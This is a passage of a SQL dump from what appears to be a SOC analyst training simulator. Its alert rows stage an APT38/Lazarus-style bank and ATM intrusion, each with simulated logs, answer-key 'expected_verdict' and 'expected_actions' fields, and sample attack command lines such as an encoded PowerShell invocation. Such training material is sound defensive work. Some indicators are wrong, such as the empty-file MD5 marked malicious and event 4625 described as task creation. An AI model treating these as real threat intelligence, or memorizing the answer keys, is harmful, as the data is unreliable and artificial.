3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"PM-2023-1005-0003\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"password_manager_exploit_v2.dll\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event\\\":\\\"Unauthorized Access\\\",\\\"description\\\":\\\"Detected exploitation of password manager vulnerability using known exploit DLL.\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.840Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"PM-2023-1005-0003\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"password_manager_exploit_v2.dll\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event\\\":\\\"Unauthorized Access\\\",\\\"description\\\":\\\"Detected exploitation of password manager vulnerability using known exploit DLL.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1454, 'Lateral Movement Detected', 'high', 'Network intrusion detection system', 'Armed with harvested credentials, the attackers penetrate deeper into the network, seeking access to the exchange\'s core financial systems.', 'Internal Network Propagation', 'T1078: Valid Accounts', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"event_id\":\"evt-45678\",\"source_ip\":\"10.5.3.25\",\"destination_ip\":\"192.168.14.45\",\"attacker_ip\":\"203.0.113.15\",\"username\":\"jdoe\",\"filename\":\"malicious_payload.exe\",\"hash\":\"3f8a5dc7c9b1e9e3e4d6a8b5f1a2c3d4\",\"event_type\":\"lateral_movement\",\"description\":\"Suspicious lateral movement detected using harvested credentials to access core financial systems.\",\"protocol\":\"SMB\",\"action\":\"access_granted\"}', '2026-03-07 00:50:13', '2026-03-09 05:51:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.5.3.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.14.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP targeted for access.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Public IP associated with known malicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account suspected of being compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Identified as part of a known malware toolkit.\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"3f8a5dc7c9b1e9e3e4d6a8b5f1a2c3d4\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious software.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1455, 'Data Exfiltration Attempt', 'high', 'Data loss prevention system', 'CryptoCore executed a final exfiltration attempt to transfer substantial volumes of financial data and cryptocurrency to external wallets.', 'Data Theft', 'T1041: Exfiltration Over C2 Channel', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T10:45:23Z\",\"event\":{\"type\":\"data_exfiltration_attempt\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"185.93.1.23\",\"username\":\"jane.doe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_name\":\"financial_report_Q3.xlsx\",\"destination_wallet\":\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\",\"protocol\":\"HTTPS\",\"data_volume\":\"2GB\"}}', '2026-03-07 00:50:13', '2026-03-09 05:52:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with the exfiltration attempt.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.93.1.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used in previous CryptoCore operations.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"internal\",\"details\":\"User account involved in the data exfiltration attempt.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Hash of file associated with suspicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"financial_report_Q3.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"clean\",\"details\":\"Regular financial report file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:45:23Z\\\",\\\"event\\\":{\\\"type\\\":\\\"data_exfiltration_attempt\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.93.1.23\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"financial_report_Q3.xlsx\\\",\\\"destination_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"2GB\\\"}}\"},{\"timestamp\":\"2026-03-07T14:14:20.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:45:23Z\\\",\\\"event\\\":{\\\"type\\\":\\\"data_exfiltration_attempt\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.93.1.23\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"financial_report_Q3.xlsx\\\",\\\"destination_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"2GB\\\"}}\"},{\"timestamp\":\"2026-03-07T14:13:20.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:45:23Z\\\",\\\"event\\\":{\\\"type\\\":\\\"data_exfiltration_attempt\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.93.1.23\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"financial_report_Q3.xlsx\\\",\\\"destination_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"2GB\\\"}}\"},{\"timestamp\":\"2026-03-07T14:12:20.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:45:23Z\\\",\\\"event\\\":{\\\"type\\\":\\\"data_exfiltration_attempt\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.93.1.23\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"financial_report_Q3.xlsx\\\",\\\"destination_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"2GB\\\"}}\"},{\"timestamp\":\"2026-03-07T14:11:20.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:45:23Z\\\",\\\"event\\\":{\\\"type\\\":\\\"data_exfiltration_attempt\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.93.1.23\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"financial_report_Q3.xlsx\\\",\\\"destination_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"2GB\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1456, 'Suspicious Access to Transaction Switch', 'high', 'Network Logs', 'An unauthorized access attempt was detected targeting the bank\'s transaction switch system. This activity is indicative of an initial access phase by APT38, known for financial theft and destructive operations.', 'Initial Access', 'T1078: Valid Accounts', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T02:45:37Z\",\"event_id\":\"1005\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.50\",\"destination_port\":\"8080\",\"protocol\":\"TCP\",\"action\":\"ALLOWED\",\"username\":\"j.doe\",\"attempted_resource\":\"/bank/transaction/switch\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"APT38_tool.bin\"}', '2026-03-07 00:50:56', '2026-03-09 05:41:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT38 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of bank\'s transaction switch.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT38 malware tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"APT38_tool.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Executable used in APT38\'s operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1457, 'Malicious Code Execution Detected', 'critical', 'Endpoint Detection and Response (EDR)', 'A custom malware was executed on the host to alter transaction codes, enabling unauthorized withdrawals from targeted ATMs.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"EDR-2023-1005-001\",\"source_ip\":\"185.92.220.123\",\"destination_ip\":\"192.168.10.25\",\"username\":\"atm_operator\",\"executed_process\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"command_line\":\"cmd.exe /c C:\\\\Malware\\\\ATMCodeChanger.exe\",\"file_hash\":\"b6a9c8e1d1d7d4a5f1b5c3e2a8f4b9d0\",\"malware_filename\":\"ATMCodeChanger.exe\",\"severity\":\"Critical\",\"description\":\"Execution of a known malicious file associated with unauthorized transaction manipulation.\"}', '2026-03-07 00:50:56', '2026-03-09 05:43:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b6a9c8e1d1d7d4a5f1b5c3e2a8f4b9d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Lazarus Group malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted endpoint.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ATMCodeChanger.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"malicious\",\"details\":\"Filename associated with unauthorized transaction manipulation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1458, 'Establishing Persistent Access', 'high', 'System Configuration Logs', 'APT38 has been detected establishing persistent access within the bank\'s infrastructure by creating backdoors. The operation involves setting up scheduled tasks and modifying startup scripts to maintain control over the compromised systems.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_id\":\"4625\",\"hostname\":\"bankserver01\",\"user\":\"SYSTEM\",\"src_ip\":\"192.168.1.45\",\"attacker_ip\":\"51.15.123.45\",\"scheduled_task\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\UpdateCheck\",\"malware_filename\":\"svchost.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Task Created\",\"description\":\"A scheduled task was created to run malicious executable at startup.\"}', '2026-03-07 00:50:56', '2026-03-09 05:44:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"51.15.123.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by Lazarus Group\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious executable mimicking legitimate system process\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.848Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"hostname\\\":\\\"bankserver01\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"51.15.123.45\\\",\\\"scheduled_task\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateCheck\\\",\\\"malware_filename\\\":\\\"svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A scheduled task was created to run malicious executable at startup.\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.848Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"hostname\\\":\\\"bankserver01\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"51.15.123.45\\\",\\\"scheduled_task\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateCheck\\\",\\\"malware_filename\\\":\\\"svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A scheduled task was created to run malicious executable at startup.\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.848Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"hostname\\\":\\\"bankserver01\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"51.15.123.45\\\",\\\"scheduled_task\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateCheck\\\",\\\"malware_filename\\\":\\\"svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A scheduled task was created to run malicious executable at startup.\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.848Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"hostname\\\":\\\"bankserver01\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"51.15.123.45\\\",\\\"scheduled_task\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateCheck\\\",\\\"malware_filename\\\":\\\"svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A scheduled task was created to run malicious executable at startup.\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.848Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"hostname\\\":\\\"bankserver01\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"51.15.123.45\\\",\\\"scheduled_task\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateCheck\\\",\\\"malware_filename\\\":\\\"svchost.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Task Created\\\",\\\"description\\\":\\\"A scheduled task was created to run malicious executable at startup.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1459, 'Coordinated Mule Network Activation - Step 4', 'high', 'ATM Surveillance Footage', 'Mules have been dispatched to various ATMs to execute synchronized cash withdrawals. Surveillance footage indicates a coordinated effort exploiting compromised systems to manipulate transactions.', 'Lateral Movement', 'T1021.002 - Remote Services: SMB/Windows Admin Shares', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.15\",\"username\":\"atm_operator\",\"filename\":\"atm_control.exe\",\"hash\":\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\",\"description\":\"ATM withdrawal command issued\",\"location\":\"ATM Terminal 12, 5th Avenue\",\"action\":\"Synchronized withdrawal command executed\"}', '2026-03-07 00:50:56', '2026-03-09 05:45:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local ATM network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"atm_operator\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected for this user\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"atm_control.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"Executable used for unauthorized ATM commands\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ATM manipulation malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-07T14:15:20.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"atm_operator\\\",\\\"filename\\\":\\\"atm_control.exe\\\",\\\"hash\\\":\\\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\\",\\\"description\\\":\\\"ATM withdrawal command issued\\\",\\\"location\\\":\\\"ATM Terminal 12, 5th Avenue\\\",\\\"action\\\":\\\"Synchronized withdrawal command executed\\\"}\"},{\"timestamp\":\"2026-03-07T14:14:20.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"atm_operator\\\",\\\"filename\\\":\\\"atm_control.exe\\\",\\\"hash\\\":\\\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\\",\\\"description\\\":\\\"ATM withdrawal command issued\\\",\\\"location\\\":\\\"ATM Terminal 12, 5th Avenue\\\",\\\"action\\\":\\\"Synchronized withdrawal command executed\\\"}\"},{\"timestamp\":\"2026-03-07T14:13:20.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"atm_operator\\\",\\\"filename\\\":\\\"atm_control.exe\\\",\\\"hash\\\":\\\"3f4a9d7b2e3f8c4b7d89e6f1a0b0c9d1\\\",\\\"description\\\":\\\"ATM withdrawal command issued\\\",\\\"location\\\":\\\"ATM Terminal 12, 5th Avenue\\\",\\\"action\\\":\\\"Synchronized withdrawal command executed\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 